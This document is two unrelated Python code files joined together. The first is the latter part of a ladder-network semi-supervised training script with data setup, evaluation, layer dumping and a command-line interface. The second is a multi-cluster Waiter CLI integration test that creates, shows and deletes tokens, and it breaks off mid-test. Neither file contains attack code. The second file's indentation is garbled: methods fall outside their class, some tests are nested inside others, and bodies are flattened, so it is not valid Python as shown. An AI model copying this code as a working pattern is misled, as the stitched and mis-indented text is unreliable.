        dataset_class, training_set_size = {
            'cifar10': (CIFAR10, 40000),
            'mnist': (MNIST, 50000),
        }[p.dataset]
    else:
        # Any other name is treated as a custom HDF5 dataset on Fuel's path.
        from fuel.datasets import H5PYDataset
        from fuel.utils import find_in_data_path
        from functools import partial
        # NOTE(review): 'partial' is imported but unused here.
        fn=p.dataset
        fn=os.path.join(fn, fn + '.hdf5')
        def dataset_class(which_sets):
            return H5PYDataset(file_or_path=find_in_data_path(fn),
                               which_sets=which_sets,
                               load_in_memory=True)
        training_set_size = None
    train_set = dataset_class(["train"])
    # Allow overriding the default from command line
    if p.get('unlabeled_samples') is not None:
        training_set_size = p.unlabeled_samples
    elif training_set_size is None:
        training_set_size = train_set.num_examples
    # Make sure the MNIST data is in right format
    if p.dataset == 'mnist':
        d = train_set.data_sources[train_set.sources.index('features')]
        assert numpy.all(d <= 1.0) and numpy.all(d >= 0.0), \
            'Make sure data is in float format and in range 0 to 1'
    # Take all indices and permutate them
    all_ind = numpy.arange(train_set.num_examples)
    if p.get('dseed'):
        rng = numpy.random.RandomState(seed=p.dseed)
        rng.shuffle(all_ind)
    d = AttributeDict()
    # Choose the training set
    d.train = train_set
    d.train_ind = all_ind[:training_set_size]
    # Then choose validation set from the remaining indices
    d.valid = train_set
    d.valid_ind = numpy.setdiff1d(all_ind, d.train_ind)[:p.valid_set_size]
    logger.info('Using %d examples for validation' % len(d.valid_ind))
    # Only touch test data if requested
    if test_set:
        d.test = dataset_class(["test"])
        d.test_ind = numpy.arange(d.test.num_examples)
    # Setup optional whitening, only used for Cifar-10
    in_dim = train_set.data_sources[train_set.sources.index('features')].shape[1:]
    if len(in_dim) > 1 and p.whiten_zca > 0:
        assert numpy.product(in_dim) == p.whiten_zca, \
            'Need %d whitening dimensions, not %d' % (numpy.product(in_dim),
                                                      p.whiten_zca)
    cnorm = ContrastNorm(p.contrast_norm) if p.contrast_norm != 0 else None
    def get_data(d, i):
        # Fetch raw features and apply contrast normalization if configured.
        data = d.get_data(request=i)[d.sources.index('features')]
        # Fuel provides Cifar in uint8, convert to float32
        data = numpy.require(data, dtype=numpy.float32)
        return data if cnorm is None else cnorm.apply(data)
    if p.whiten_zca > 0:
        logger.info('Whitening using %d ZCA components' % p.whiten_zca)
        whiten = ZCA()
        whiten.fit(p.whiten_zca, get_data(d.train, d.train_ind))
    else:
        whiten = None
    return in_dim, d, whiten, cnorm
def get_error(args):
    """Return the classification error rate in percent.

    Defaults 'data_type' to 'test' and sets the 'no_load' marker consumed
    downstream, then scores argmax predictions against the true labels.
    """
    args.setdefault('data_type', 'test')
    args['no_load'] = 'g_'
    targets, activations = analyze(args)
    predictions = activations.argmax(axis=1)
    n_correct = (predictions == targets.flatten()).sum()
    error_fraction = 1. - n_correct / float(len(predictions))
    return error_fraction * 100.
def get_layer(args):
    """Return the activations of the layer just below softmax.

    Defaults: evaluate on the test set, layer index -1 (the top layer).
    """
    for key, fallback in (('data_type', 'test'), ('layer', -1)):
        args[key] = args.get(key, fallback)
    args['no_load'] = 'g_'
    _, activations = analyze(args)
    return activations
def analyze(cli_params):
    """Run the trained model over one data split and collect activations.

    Called when evaluating.
    :return: (targets, result) — concatenated labels of the labeled pathway
        and the stacked per-batch outputs of the monitored layer.
    """
    p, _ = load_and_log_params(cli_params)
    _, data, whiten, cnorm = setup_data(p, test_set=(p.data_type == 'test'))
    ladder = setup_model(p)
    # Analyze activations
    if p.data_type == 'train':
        dset, indices, calc_batchnorm = data.train, data.train_ind, False
    elif p.data_type == 'valid':
        dset, indices, calc_batchnorm = data.valid, data.valid_ind, True
    elif p.data_type == 'test':
        dset, indices, calc_batchnorm = data.test, data.test_ind, True
    else:
        raise Exception("Unknown data-type %s"%p.data_type)
    if calc_batchnorm:
        # One pass over the training data to estimate batch-norm statistics
        # before evaluating on valid/test.
        logger.info('Calculating batch normalization for clean.labeled path')
        main_loop = DummyLoop(
            extensions=[
                FinalTestMonitoring(
                    [ladder.costs.class_clean, ladder.error.clean]
                    + ladder.costs.denois.values(),
                    make_datastream(data.train, data.train_ind,
                                    # These need to match with the training
                                    p.batch_size,
                                    n_labeled=p.labeled_samples,
                                    n_unlabeled=len(data.train_ind),
                                    cnorm=cnorm,
                                    whiten=whiten, scheme=ShuffledScheme),
                    make_datastream(data.valid, data.valid_ind,
                                    p.valid_batch_size,
                                    n_labeled=len(data.valid_ind),
                                    n_unlabeled=len(data.valid_ind),
                                    cnorm=cnorm,
                                    whiten=whiten, scheme=ShuffledScheme),
                    prefix="valid_final", before_training=True),
                ShortPrinting({
                    "valid_final": OrderedDict([
                        ('VF_C_class', ladder.costs.class_clean),
                        ('VF_E', ladder.error.clean),
                        ('VF_C_de', [ladder.costs.denois.get(0),
                                     ladder.costs.denois.get(1),
                                     ladder.costs.denois.get(2),
                                     ladder.costs.denois.get(3)]),
                    ]),
                }, after_training=True, use_log=False),
            ])
        main_loop.run()
    # Make a datastream that has all the indices in the labeled pathway
    ds = make_datastream(dset, indices,
                         batch_size=p.get('batch_size'),
                         n_labeled=len(indices),
                         n_unlabeled=len(indices),
                         balanced_classes=False,
                         whiten=whiten,
                         cnorm=cnorm,
                         scheme=SequentialScheme)
    # If layer=-1 we want out the values after softmax
    outputs = ladder.act.clean.labeled.h[len(ladder.layers) - 1]
    # Replace the batch normalization paramameters with the shared variables
    if calc_batchnorm:
        outputreplacer = TestMonitoring()
        _, _, outputs = outputreplacer._get_bn_params(outputs)
    cg = ComputationGraph(outputs)
    f = cg.get_theano_function()
    it = ds.get_epoch_iterator(as_dict=True)
    res = []
    inputs = {'features_labeled': [],
              'targets_labeled': [],
              'features_unlabeled': []}
    # Loop over one epoch
    for d in it:
        # Store all inputs
        for k, v in d.iteritems():
            inputs[k] += [v]
        # Store outputs
        res += [f(*[d[str(inp)] for inp in cg.inputs])]
    # Concatenate all minibatches
    res = [numpy.vstack(minibatches) for minibatches in zip(*res)]
    inputs = {k: numpy.concatenate(v) for k, v in inputs.iteritems()}
    return inputs['targets_labeled'], res[0]
def dump_unlabeled_encoder(cli_params):
    """Dump the clean unlabeled-path activations of one encoder layer.

    Called when dumping. Largely mirrors analyze(); differs only in which
    activations are extracted (unlabeled path, selectable layer) and in not
    collecting the inputs.
    :return: the stacked per-batch activations of the chosen layer
    """
    p, _ = load_and_log_params(cli_params)
    _, data, whiten, cnorm = setup_data(p, test_set=(p.data_type == 'test'))
    ladder = setup_model(p)
    # Analyze activations
    if p.data_type == 'train':
        dset, indices, calc_batchnorm = data.train, data.train_ind, False
    elif p.data_type == 'valid':
        dset, indices, calc_batchnorm = data.valid, data.valid_ind, True
    elif p.data_type == 'test':
        dset, indices, calc_batchnorm = data.test, data.test_ind, True
    else:
        raise Exception("Unknown data-type %s"%p.data_type)
    if calc_batchnorm:
        # Estimate batch-norm statistics from training data first.
        logger.info('Calculating batch normalization for clean.labeled path')
        main_loop = DummyLoop(
            extensions=[
                FinalTestMonitoring(
                    [ladder.costs.class_clean, ladder.error.clean]
                    + ladder.costs.denois.values(),
                    make_datastream(data.train, data.train_ind,
                                    # These need to match with the training
                                    p.batch_size,
                                    n_labeled=p.labeled_samples,
                                    n_unlabeled=len(data.train_ind),
                                    cnorm=cnorm,
                                    whiten=whiten, scheme=ShuffledScheme),
                    make_datastream(data.valid, data.valid_ind,
                                    p.valid_batch_size,
                                    n_labeled=len(data.valid_ind),
                                    n_unlabeled=len(data.valid_ind),
                                    cnorm=cnorm,
                                    whiten=whiten, scheme=ShuffledScheme),
                    prefix="valid_final", before_training=True),
                ShortPrinting({
                    "valid_final": OrderedDict([
                        ('VF_C_class', ladder.costs.class_clean),
                        ('VF_E', ladder.error.clean),
                        ('VF_C_de', [ladder.costs.denois.get(0),
                                     ladder.costs.denois.get(1),
                                     ladder.costs.denois.get(2),
                                     ladder.costs.denois.get(3)]),
                    ]),
                }, after_training=True, use_log=False),
            ])
        main_loop.run()
    # Make a datastream that has all the indices in the labeled pathway
    ds = make_datastream(dset, indices,
                         batch_size=p.get('batch_size'),
                         n_labeled=len(indices),
                         n_unlabeled=len(indices),
                         balanced_classes=False,
                         whiten=whiten,
                         cnorm=cnorm,
                         scheme=SequentialScheme)
    # If layer=-1 we want out the values after softmax
    if p.layer < 0:
        # ladder.act.clean.unlabeled.h is a dict not a list
        outputs = ladder.act.clean.unlabeled.h[len(ladder.layers) + p.layer]
    else:
        outputs = ladder.act.clean.unlabeled.h[p.layer]
    # Replace the batch normalization paramameters with the shared variables
    if calc_batchnorm:
        outputreplacer = TestMonitoring()
        _, _, outputs = outputreplacer._get_bn_params(outputs)
    cg = ComputationGraph(outputs)
    f = cg.get_theano_function()
    it = ds.get_epoch_iterator(as_dict=True)
    res = []
    # Loop over one epoch
    for d in it:
        # Store outputs
        res += [f(*[d[str(inp)] for inp in cg.inputs])]
    # Concatenate all minibatches
    res = [numpy.vstack(minibatches) for minibatches in zip(*res)]
    return res[0]
def train(cli_params):
    """Train a ladder network with the given CLI/hyper parameters.

    :param cli_params: dict of parameters; 'save_to' names the result dir.
    :return: a pandas DataFrame of the training log, or None when the run
        was interrupted (the caller stops iterating configurations then).
    """
    cli_params['save_dir'] = prepare_dir(cli_params['save_to'])
    logfile = os.path.join(cli_params['save_dir'], 'log.txt')
    # Log also DEBUG to a file
    fh = logging.FileHandler(filename=logfile)
    fh.setLevel(logging.DEBUG)
    logger.addHandler(fh)
    logger.info('Logging into %s' % logfile)
    p, loaded = load_and_log_params(cli_params)
    in_dim, data, whiten, cnorm = setup_data(p, test_set=False)
    if not loaded:
        # Set the zero layer to match input dimensions
        p.encoder_layers = (in_dim,) + p.encoder_layers
    ladder = setup_model(p)
    # Training
    all_params = ComputationGraph([ladder.costs.total]).parameters
    logger.info('Found the following parameters: %s' % str(all_params))
    # Fetch all batch normalization updates. They are in the clean path.
    bn_updates = ComputationGraph([ladder.costs.class_clean]).updates
    assert 'counter' in [u.name for u in bn_updates.keys()], \
        'No batch norm params in graph - the graph has been cut?'
    training_algorithm = GradientDescent(
        cost=ladder.costs.total, parameters=all_params,
        step_rule=Adam(learning_rate=ladder.lr))
    # In addition to actual training, also do BN variable approximations
    training_algorithm.add_updates(bn_updates)
    # Keys printed per monitoring channel by ShortPrinting.
    short_prints = {
        "train": {
            'T_C_class': ladder.costs.class_corr,
            'T_C_de': ladder.costs.denois.values(),
            'T_T': ladder.costs.total,
        },
        "valid_approx": OrderedDict([
            ('V_C_class', ladder.costs.class_clean),
            ('V_E', ladder.error.clean),
            ('V_C_de', ladder.costs.denois.values()),
            ('V_T', ladder.costs.total),
        ]),
        "valid_final": OrderedDict([
            ('VF_C_class', ladder.costs.class_clean),
            ('VF_E', ladder.error.clean),
            ('VF_C_de', ladder.costs.denois.values()),
            # NOTE(review): label 'V_T' here looks like a copy-paste of the
            # valid_approx entry ('VF_T' would match the prefix) — confirm.
            ('V_T', ladder.costs.total),
        ]),
    }
    main_loop = MainLoop(
        training_algorithm,
        # Datastream used for training
        make_datastream(data.train, data.train_ind,
                        p.batch_size,
                        n_labeled=p.labeled_samples,
                        n_unlabeled=p.unlabeled_samples,
                        whiten=whiten,
                        cnorm=cnorm,
                        dseed=p.dseed),
        model=Model(ladder.costs.total),
        extensions=[
            FinishAfter(after_n_epochs=p.num_epochs),
            # This will estimate the validation error using
            # running average estimates of the batch normalization
            # parameters, mean and variance
            ApproxTestMonitoring(
                [ladder.costs.class_clean, ladder.error.clean, ladder.costs.total]
                + ladder.costs.denois.values(),
                make_datastream(data.valid, data.valid_ind,
                                p.valid_batch_size, whiten=whiten, cnorm=cnorm,
                                scheme=ShuffledScheme),
                prefix="valid_approx"),
            # This Monitor is slower, but more accurate since it will first
            # estimate batch normalization parameters from training data and
            # then do another pass to calculate the validation error.
            FinalTestMonitoring(
                [ladder.costs.class_clean, ladder.error.clean, ladder.costs.total]
                + ladder.costs.denois.values(),
                make_datastream(data.train, data.train_ind,
                                p.batch_size,
                                n_labeled=p.labeled_samples,
                                whiten=whiten, cnorm=cnorm,
                                scheme=ShuffledScheme),
                make_datastream(data.valid, data.valid_ind,
                                p.valid_batch_size,
                                n_labeled=len(data.valid_ind),
                                whiten=whiten, cnorm=cnorm,
                                scheme=ShuffledScheme),
                prefix="valid_final",
                after_n_epochs=p.num_epochs, after_training=True),
            TrainingDataMonitoring(
                [ladder.costs.total, ladder.costs.class_corr,
                 training_algorithm.total_gradient_norm]
                + ladder.costs.denois.values(),
                prefix="train", after_epoch=True),
            SaveParams(('train',ladder.costs.total), all_params, p.save_dir, after_epoch=True),
            SaveExpParams(p, p.save_dir, before_training=True),
            SaveLog(p.save_dir, after_training=True),
            ShortPrinting(short_prints),
            LRDecay(ladder.lr, p.num_epochs * p.lrate_decay, p.num_epochs,
                    after_epoch=True),
        ])
    main_loop.run()
    # Get results
    df = DataFrame.from_dict(main_loop.log, orient='index')
    col = 'valid_final_error_rate_clean'
    logger.info('%s %g' % (col, df[col].iloc[-1]))
    if main_loop.log.status['epoch_interrupt_received']:
        return None
    return df
if __name__ == "__main__":
    # Command-line entry point with three sub-commands: train / evaluate / dump.
    logging.basicConfig(level=logging.INFO)
    # Small string-munging helpers for parsing comma/dash-separated
    # hyperparameter lists from the command line.
    rep = lambda s: s.replace('-', ',')
    chop = lambda s: s.split(',')
    to_int = lambda ss: [int(s) for s in ss if s.isdigit()]
    to_float = lambda ss: [float(s) for s in ss]
    def to_bool(s):
        # Strict bool parser (argparse's type=bool would accept anything).
        if s.lower() in ['true', 't']:
            return True
        elif s.lower() in ['false', 'f']:
            return False
        else:
            raise Exception("Unknown bool value %s" % s)
    def compose(*funs):
        # Right-to-left composition: compose(f, g)(x) == f(g(x)).
        return functools.reduce(lambda f, g: lambda x: f(g(x)), funs)
    # Functional parsing logic to allow flexible function compositions
    # as actions for ArgumentParser
    def funcs(additional_arg):
        # Build a custom argparse Action applying the given function chain
        # to the raw value (or to each element of a list of values).
        class customAction(Action):
            def __call__(self, parser, args, values, option_string=None):
                def process(arg, func_list):
                    if arg is None:
                        return None
                    elif type(arg) is list:
                        return map(compose(*func_list), arg)
                    else:
                        return compose(*func_list)(arg)
                setattr(args, self.dest, process(values, additional_arg))
        return customAction
    def add_train_params(parser, use_defaults):
        # Register all training hyperparameters on the given sub-parser;
        # defaults only apply for the 'train' command (use_defaults=True).
        a = parser.add_argument
        default = lambda x: x if use_defaults else None
        # General hyper parameters and settings
        a("save_to", help="Destination to save the state and results",
          default=default("noname"), nargs="?")
        a("--num-epochs", help="Number of training epochs",
          type=int, default=default(150))
        a("--seed", help="Seed",
          type=int, default=default([1]), nargs='+')
        a("--dseed", help="Data permutation seed, defaults to 'seed'",
          type=int, default=default([None]), nargs='+')
        a("--labeled-samples", help="How many supervised samples are used",
          type=str, default=default(None), nargs='+', action=funcs([tuple, to_int, chop]))
        a("--unlabeled-samples", help="How many unsupervised samples are used",
          type=int, default=default(None), nargs='+')
        a("--dataset", type=str, default=default(['mnist']), nargs='+',
          help="Which dataset to use. mnist, cifar10 or your own hdf5")
        a("--lr", help="Initial learning rate",
          type=float, default=default([0.002]), nargs='+')
        a("--lrate-decay", help="When to linearly start decaying lrate (0-1)",
          type=float, default=default([0.67]), nargs='+')
        a("--batch-size", help="Minibatch size",
          type=int, default=default([100]), nargs='+')
        a("--valid-batch-size", help="Minibatch size for validation data",
          type=int, default=default([100]), nargs='+')
        a("--valid-set-size", help="Number of examples in validation set",
          type=int, default=default([10000]), nargs='+')
        # Hyperparameters controlling supervised path
        a("--super-noise-std", help="Noise added to supervised learning path",
          type=float, default=default([0.3]), nargs='+')
        a("--f-local-noise-std", help="Noise added encoder path",
          type=str, default=default([0.3]), nargs='+',
          action=funcs([tuple, to_float, chop]))
        a("--act", nargs='+', type=str, action=funcs([tuple, chop, rep]),
          default=default(["relu"]), help="List of activation functions")
        a("--encoder-layers", help="List of layers for f",
          type=str, default=default(()), action=funcs([tuple, chop, rep]))
        # Hyperparameters controlling unsupervised training
        a("--denoising-cost-x", help="Weight of the denoising cost.",
          type=str, default=default([(0.,)]), nargs='+',
          action=funcs([tuple, to_float, chop]))
        a("--decoder-spec", help="List of decoding function types", nargs='+',
          type=str, default=default(['sig']), action=funcs([tuple, chop, rep]))
        a("--zestbn", type=str, default=default(['bugfix']), nargs='+',
          choices=['bugfix', 'no'], help="How to do zest bn")
        # Hyperparameters used for Cifar training
        a("--contrast-norm", help="Scale of contrast normalization (0=off)",
          type=int, default=default([0]), nargs='+')
        a("--top-c", help="Have c at softmax?", action=funcs([to_bool]),
          default=default([True]), nargs='+')
        a("--whiten-zca", help="Whether to whiten the data with ZCA",
          type=int, default=default([0]), nargs='+')
    ap = ArgumentParser("Semisupervised experiment")
    subparsers = ap.add_subparsers(dest='cmd', help='sub-command help')
    # TRAIN
    train_cmd = subparsers.add_parser('train', help='Train a new model')
    add_train_params(train_cmd, use_defaults=True)
    # EVALUATE
    load_cmd = subparsers.add_parser('evaluate', help='Evaluate test error')
    load_cmd.add_argument('load_from', type=str,
                          help="Destination to load the state from")
    load_cmd.add_argument('--data-type', type=str, default='test',
                          help="Data set to evaluate on")
    # DUMP
    dump_cmd = subparsers.add_parser('dump', help='Store the output of an encoder layer for all inputs')
    dump_cmd.add_argument('load_from', type=str,
                          help="Destination to load the state from, and where to save the dump")
    dump_cmd.add_argument('--data-type', type=str, default='test',
                          help="Data set to evaluate on")
    dump_cmd.add_argument("--layer", type=int, default=-1,
                          help="which layer to dump (default top)")
    args = ap.parse_args()
    # Record the current git commit alongside the experiment parameters.
    subp = subprocess.Popen(['git', 'rev-parse', 'HEAD'],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    out, err = subp.communicate()
    args.commit = out.strip()
    if err.strip():
        logger.error('Subprocess returned %s' % err.strip())
    t_start = time.time()
    if args.cmd == 'evaluate':
        # Evaluation loads a single saved config: unwrap 1-element lists.
        for k, v in vars(args).iteritems():
            if type(v) is list:
                assert len(v) == 1, "should not be a list when loading: %s" % k
                logger.info("%s" % str(v[0]))
                vars(args)[k] = v[0]
        err = get_error(vars(args))
        logger.info('Test error: %f' % err)
    elif args.cmd == 'dump':
        layer = dump_unlabeled_encoder(vars(args))
        fname = os.path.join(args.load_from,'layer%d'%args.layer)
        logger.info("Saving dump to %s" % fname)
        numpy.save(fname, layer)
    elif args.cmd == "train":
        # Cartesian product over all list-valued hyperparameters: one
        # training run per combination; abort the sweep on interruption
        # (train() returns None).
        listdicts = {k: v for k, v in vars(args).iteritems() if type(v) is list}
        therest = {k: v for k, v in vars(args).iteritems() if type(v) is not list}
        gen1, gen2 = tee(product(*listdicts.itervalues()))
        l = len(list(gen1))
        for i, d in enumerate(dict(izip(listdicts, x)) for x in gen2):
            if l > 1:
                logger.info('Training configuration %d / %d' % (i+1, l))
            d.update(therest)
            if train(d) is None:
                break
    logger.info('Took %.1f minutes' % ((time.time() - t_start) / 60.))
|
|
import logging
import os
from sys import version
import unittest
import uuid
import re
import pytest
from tests.waiter import cli, util
@pytest.mark.cli
@unittest.skipUnless(util.multi_cluster_tests_enabled(), 'Requires setting WAITER_TEST_MULTI_CLUSTER')
@pytest.mark.timeout(util.DEFAULT_TEST_TIMEOUT_SECS)
class MultiWaiterCliTest(util.WaiterTest):
@classmethod
def setUpClass(cls):
    # Resolve both Waiter cluster endpoints once for the whole test class
    # and prime a session against each before any test runs.
    cls.waiter_url_1 = util.retrieve_waiter_url()
    cls.waiter_url_2 = util.retrieve_waiter_url('WAITER_URL_2', 'http://localhost:9191')
    util.init_waiter_session(cls.waiter_url_1, cls.waiter_url_2)
    cli.write_base_config()
def setUp(self):
    # Copy the class-level URLs onto the instance for convenient access
    # and look up each cluster's advertised name.
    self.waiter_url_1 = type(self).waiter_url_1
    self.waiter_url_2 = type(self).waiter_url_2
    self.logger = logging.getLogger(__name__)
    self.waiter_1_cluster = util.retrieve_waiter_cluster_name(self.waiter_url_1)
    self.waiter_2_cluster = util.retrieve_waiter_cluster_name(self.waiter_url_2)
def __two_cluster_config(self):
    """CLI config dict listing both Waiter clusters under fixed names."""
    clusters = [
        {'name': 'waiter1', 'url': self.waiter_url_1},
        {'name': 'waiter2', 'url': self.waiter_url_2},
    ]
    return {'clusters': clusters}
def test_federated_show(self):
    """`show` with a multi-cluster config must merge tokens from all clusters."""
    # Create in cluster #1
    token_name = self.token_name()
    version_1 = str(uuid.uuid4())
    util.post_token(self.waiter_url_1, token_name, {'version': version_1})
    try:
        # Single query for the token name, federated across clusters
        config = self.__two_cluster_config()
        with cli.temp_config_file(config) as path:
            cp, tokens = cli.show_token('json', token_name=token_name, flags='--config %s' % path)
            versions = [t['version'] for t in tokens]
            self.assertEqual(0, cp.returncode, cp.stderr)
            # Only cluster #1 has the token so far.
            self.assertEqual(1, len(tokens), tokens)
            self.assertIn(version_1, versions)
            # Create in cluster #2
            version_2 = str(uuid.uuid4())
            util.post_token(self.waiter_url_2, token_name, {'version': version_2})
            try:
                # Again, single query for the token name, federated across clusters
                cp, tokens = cli.show_token('json', token_name=token_name, flags='--config %s' % path)
                versions = [t['version'] for t in tokens]
                self.assertEqual(0, cp.returncode, cp.stderr)
                # Now both clusters' copies must be reported.
                self.assertEqual(2, len(tokens), tokens)
                self.assertIn(version_1, versions)
                self.assertIn(version_2, versions)
            finally:
                util.delete_token(self.waiter_url_2, token_name)
    finally:
        util.delete_token(self.waiter_url_1, token_name)
def __test_show_single_cluster_group(self, no_services=False, enforce_cluster=False):
    """Shared body for the single-sync-group `show` tests below.

    Both clusters belong to one 'production' sync group; depending on the
    flags, `show` must either aggregate services across clusters or, with
    --cluster, restrict output to waiter1 only.
    """
    config = {'clusters': [{'name': 'waiter1',
                            'url': self.waiter_url_1,
                            'default-for-create': True,
                            'sync-group': 'production'},
                           {'name': 'waiter2',
                            'url': self.waiter_url_2,
                            'sync-group': 'production'}]}
    token_name = self.token_name()
    version_1 = str(uuid.uuid4())
    token_1 = util.minimal_service_description(**{'cluster': 'waiter1', 'version': version_1})
    util.post_token(self.waiter_url_1, token_name, token_1, update_mode_admin=True)
    try:
        service_id_1 = util.ping_token(self.waiter_url_1, token_name)
        version_2 = str(uuid.uuid4())
        # NOTE(review): token_2 also claims 'cluster': 'waiter1' — looks
        # intentional for the single-sync-group setup (making waiter2's copy
        # "Not Current"); confirm against the multi-group variant below.
        token_2 = util.minimal_service_description(**{'cluster': 'waiter1', 'version': version_2})
        util.post_token(self.waiter_url_2, token_name, token_2, update_mode_admin=True)
        try:
            service_id_2 = util.ping_token(self.waiter_url_2, token_name)
            with cli.temp_config_file(config) as path:
                show_flags = '--no-services' if no_services else ''
                cli_flags = f'--config {path}' + (' --cluster waiter1' if enforce_cluster else '')
                cp = cli.show(token_name=token_name, flags=cli_flags, show_flags=show_flags)
                self.assertEqual(0, cp.returncode, cp.stderr)
                # Header shows either the enforced cluster or the sync group.
                if enforce_cluster:
                    self.assertIn(f'waiter1 / {token_name}', cli.stdout(cp))
                else:
                    self.assertIn(f'production / {token_name}', cli.stdout(cp))
                self.assertIn(version_1, cli.stdout(cp))
                self.assertEqual(1, cli.stdout(cp).count(token_name))
                if no_services:
                    self.assertNotIn(service_id_1, cli.stdout(cp))
                    self.assertNotIn(service_id_2, cli.stdout(cp))
                else:
                    if enforce_cluster:
                        expected_service_count = 1
                        expected_inst_count = 1
                        expected_total_mem = token_1['mem']
                        expected_total_cpus = token_1['cpus']
                    else:
                        expected_service_count = 2
                        expected_inst_count = 2
                        expected_total_mem = token_1["mem"] + token_2["mem"]
                        expected_total_cpus = token_1["cpus"] + token_2["cpus"]
                        # waiter2's service only shows without --cluster.
                        self.assertEqual(1, cli.stdout(cp).count(service_id_2))
                        self.assertIsNotNone(re.search(f'^{service_id_2}\\s+waiter2[^\\n]+Running[^\\n]+Not Current$', cli.stdout(cp), re.MULTILINE))
                    self.assertIsNotNone(re.search(f'^# Services\\s+{expected_service_count}$', cli.stdout(cp), re.MULTILINE))
                    self.assertIsNotNone(re.search(f'^# Failing\\s+0$', cli.stdout(cp), re.MULTILINE))
                    self.assertIsNotNone(re.search(f'^# Instances\\s+{expected_inst_count}$', cli.stdout(cp), re.MULTILINE))
                    self.assertIsNotNone(re.search(f'^Total Memory\\s+{expected_total_mem} MiB$', cli.stdout(cp), re.MULTILINE))
                    self.assertIsNotNone(re.search(f'^Total CPUs\\s+{expected_total_cpus}$', cli.stdout(cp), re.MULTILINE))
                    self.assertEqual(1, cli.stdout(cp).count(service_id_1))
                    self.assertIsNotNone(re.search(f'^{service_id_1}\\s+waiter1[^\\n]+Running[^\\n]+Current$', cli.stdout(cp), re.MULTILINE))
        finally:
            util.delete_token(self.waiter_url_2, token_name, assert_response=True, kill_services=True)
    finally:
        util.delete_token(self.waiter_url_1, token_name, assert_response=True, kill_services=True)
def test_show_single_cluster_group(self):
    # Default path: one sync group, services listed.
    self.__test_show_single_cluster_group()
    def test_show_single_cluster_group_no_services(self):
        """Run the single-sync-group `show` scenario with --no-services."""
        self.__test_show_single_cluster_group(no_services=True)
    def test_show_single_cluster_group_enforce_cluster(self):
        """Run the single-sync-group `show` scenario with --cluster waiter1."""
        self.__test_show_single_cluster_group(enforce_cluster=True)
def __test_show_multiple_cluster_groups(self, no_services=False, enforce_cluster=False):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'production'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'staging'}]}
token_name = self.token_name()
version_1 = str(uuid.uuid4())
token_1 = util.minimal_service_description(**{'cluster': 'waiter1', 'version': version_1})
util.post_token(self.waiter_url_1, token_name, token_1, update_mode_admin=True)
try:
service_id_1 = util.ping_token(self.waiter_url_1, token_name)
version_2 = str(uuid.uuid4())
token_2 = util.minimal_service_description(**{'cluster': 'waiter2', 'version': version_2})
util.post_token(self.waiter_url_2, token_name, token_2, update_mode_admin=True)
try:
service_id_2 = util.ping_token(self.waiter_url_2, token_name)
with cli.temp_config_file(config) as path:
show_flags = '--no-services' if no_services else ''
cli_flags = f'--config {path}' + (' --cluster waiter1' if enforce_cluster else '')
cp = cli.show(token_name=token_name, flags=cli_flags, show_flags=show_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(1, len(re.findall(f'^Version\\s+{version_1}$', cli.stdout(cp), re.MULTILINE)))
if enforce_cluster:
expected_token_count = 1
self.assertIn(f'waiter1 / {token_name}', cli.stdout(cp))
self.assertEqual(1, cli.stdout(cp).count(token_name))
else:
expected_token_count = 2
self.assertIn(f'production / {token_name}', cli.stdout(cp))
self.assertIn(f'staging / {token_name}', cli.stdout(cp))
self.assertEqual(1, len(re.findall(f'^Version\\s+{version_2}$', cli.stdout(cp), re.MULTILINE)))
self.assertEqual(2, cli.stdout(cp).count(token_name))
if no_services:
self.assertNotIn(service_id_1, cli.stdout(cp))
self.assertNotIn(service_id_2, cli.stdout(cp))
else:
self.assertEqual(1, cli.stdout(cp).count(service_id_1))
self.assertEqual(expected_token_count, len(re.findall('^# Services\\s+1$', cli.stdout(cp), re.MULTILINE)))
self.assertEqual(expected_token_count, len(re.findall('^# Failing\\s+0$', cli.stdout(cp), re.MULTILINE)))
self.assertEqual(expected_token_count, len(re.findall('^# Instances\\s+1$', cli.stdout(cp), re.MULTILINE)))
self.assertEqual(expected_token_count, len(re.findall(f'^Total Memory\\s+{token_1["mem"]} MiB$', cli.stdout(cp), re.MULTILINE)))
self.assertEqual(expected_token_count, len(re.findall(f'^Total CPUs\\s+{token_1["cpus"]}$', cli.stdout(cp), re.MULTILINE)))
self.assertIsNotNone(re.search(f'^{service_id_1}\\s+waiter1[^\\n]+Running[^\\n]+Current$', cli.stdout(cp), re.MULTILINE))
if not enforce_cluster:
self.assertEqual(1, cli.stdout(cp).count(service_id_2))
self.assertEqual(1, cli.stdout(cp).count(service_id_2))
self.assertIsNotNone(re.search(f'^{service_id_2}\\s+waiter2[^\\n]+Running[^\\n]+Current$', cli.stdout(cp), re.MULTILINE))
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=True, kill_services=True)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=True, kill_services=True)
    def test_show_multiple_cluster_groups(self):
        """`show` across two sync groups (production/staging) with default flags."""
        self.__test_show_multiple_cluster_groups()
    def test_show_multiple_cluster_groups_no_services(self):
        """`show` across two sync groups with --no-services."""
        self.__test_show_multiple_cluster_groups(no_services=True)
    def test_show_multiple_cluster_groups_enforce_cluster(self):
        """`show` across two sync groups with --cluster waiter1."""
        self.__test_show_multiple_cluster_groups(enforce_cluster=True)
def test_federated_delete(self):
# Create in cluster #1
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
# Create in cluster #2
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2})
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# Delete the token in both clusters
cp = cli.delete(token_name=token_name, flags='--config %s' % path, delete_flags='--force')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('exists in 2 cluster(s)', cli.stdout(cp))
self.assertIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(2, cli.stdout(cp).count('Deleting token'))
self.assertEqual(2, cli.stdout(cp).count('Successfully deleted'))
util.load_token(self.waiter_url_1, token_name, expected_status_code=404)
util.load_token(self.waiter_url_2, token_name, expected_status_code=404)
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=False)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=False)
def test_delete_single_cluster(self):
# Create in cluster #1
token_name = self.token_name()
version_1 = str(uuid.uuid4())
